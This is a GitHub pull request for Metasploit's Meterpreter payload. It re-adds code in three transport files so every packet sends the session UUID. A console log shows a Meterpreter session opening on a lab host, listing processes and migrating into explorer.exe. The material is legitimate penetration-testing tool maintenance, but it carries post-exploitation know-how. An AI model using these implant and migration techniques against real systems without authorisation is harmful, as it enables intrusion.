### PR TITLE
Re-add key UUID sending functionality

### DIFF
--- a/c/meterpreter/source/server/server_setup_posix.c
+++ b/c/meterpreter/source/server/server_setup_posix.c
@@ -553,6 +553,9 @@ DWORD packet_transmit_via_ssl(Remote* remote, Packet* packet, PacketRequestCompl
 		packet_add_tlv_string(packet, TLV_TYPE_REQUEST_ID, rid);
 	}
 
+	// Always add the UUID to the packet as well, so that MSF knows who and what we are
+	packet_add_tlv_raw(packet, TLV_TYPE_UUID, remote->orig_config->session.uuid, UUID_SIZE);
+
 	do
 	{
 		// If a completion routine was supplied and the packet has a request

--- a/c/meterpreter/source/server/win/server_transport_tcp.c
+++ b/c/meterpreter/source/server/win/server_transport_tcp.c
@@ -1030,6 +1030,9 @@ DWORD packet_transmit_via_ssl(Remote* remote, Packet* packet, PacketRequestCompl
 		packet_add_tlv_string(packet, TLV_TYPE_REQUEST_ID, rid);
 	}
 
+	// Always add the UUID to the packet as well, so that MSF knows who and what we are
+  	packet_add_tlv_raw(packet, TLV_TYPE_UUID, remote->orig_config->session.uuid, UUID_SIZE);
+
 	do
 	{
 		// If a completion routine was supplied and the packet has a request

--- a/c/meterpreter/source/server/win/server_transport_winhttp.c
+++ b/c/meterpreter/source/server/win/server_transport_winhttp.c
@@ -347,6 +347,9 @@ static DWORD packet_transmit_via_http(Remote *remote, Packet *packet, PacketRequ
 		packet_add_tlv_string(packet, TLV_TYPE_REQUEST_ID, rid);
 	}
 
+	// Always add the UUID to the packet as well, so that MSF knows who and what we are
+  	packet_add_tlv_raw(packet, TLV_TYPE_UUID, remote->orig_config->session.uuid, UUID_SIZE);
+
 	do
 	{
 		// If a completion routine was supplied and the packet has a request


### PR DESCRIPTION
As part of https://github.com/rapid7/metasploit-payloads/commit/b50955a92476e797256158db783ba9684db2a902 important code that sent UUIDs along with each request was accidentally removed. This PR re-includes it so that the UUIDs are in fact sent when they should be sent.

This fixes issues where UUID commands don't work, and fixes migration in
a bunch of scenarios.

## Sample run
```
sf exploit(handler) > WARNING: Local file /home/oj/code/metasploit-framework/data/meterpreter/metsrv.x86.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[*] [2016.12.07-13:24:33] Sending stage (983603 bytes) to 10.1.10.56
[*] Meterpreter session 1 opened (10.1.10.40:8000 -> 10.1.10.56:50001) at 2016-12-07 13:24:35 +1000
WARNING: Local file /home/oj/code/metasploit-framework/data/meterpreter/ext_server_stdapi.x86.dll is being used
WARNING: Local file /home/oj/code/metasploit-framework/data/meterpreter/ext_server_priv.x86.dll is being used
sess -1
[*] Starting interaction with 1...

meterpreter > uuid
[+] UUID: ae41b11836a72510/x86=1/windows=1/2016-12-07T03:24:33Z
meterpreter > ps -S expl

Process List
============

 PID   PPID  Name                      Arch  Session  User                Path
 ---   ----  ----                      ----  -------  ----                ----
 3588  3560  explorer.exe              x64   1        DESKTOP-TF4F7AM\oj  C:\Windows\explorer.exe

meterpreter > migrate 3588
[*] Migrating from 2728 to 3588...
WARNING: Local file /home/oj/code/metasploit-framework/data/meterpreter/metsrv.x64.dll is being used
WARNING: Local file /home/oj/code/metasploit-framework/data/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/oj/code/metasploit-framework/data/meterpreter/ext_server_priv.x64.dll is being used
[*] Migration completed successfully.
meterpreter > uuid
[+] UUID: ae41b11836a72510/x64=2/windows=1/2016-12-07T03:24:33Z
```

## Verification

- [ ] Create a session using `windows/meterpreter/reverse_tcp_rc4`.
- [ ] Run `uuid`, and it should work.
- [ ] Migrate across architectures, and it should work.

## Notes

This is a pretty urgent thing, so if any committers out there who are present ( @bcook-r7 @hdm @wvu-r7 @zeroSteiner ) I'd appreciate this getting looked at ASAP.

This fixes https://github.com/rapid7/metasploit-framework/issues/7660 and removes the need for https://github.com/rapid7/metasploit-framework/pull/7663.
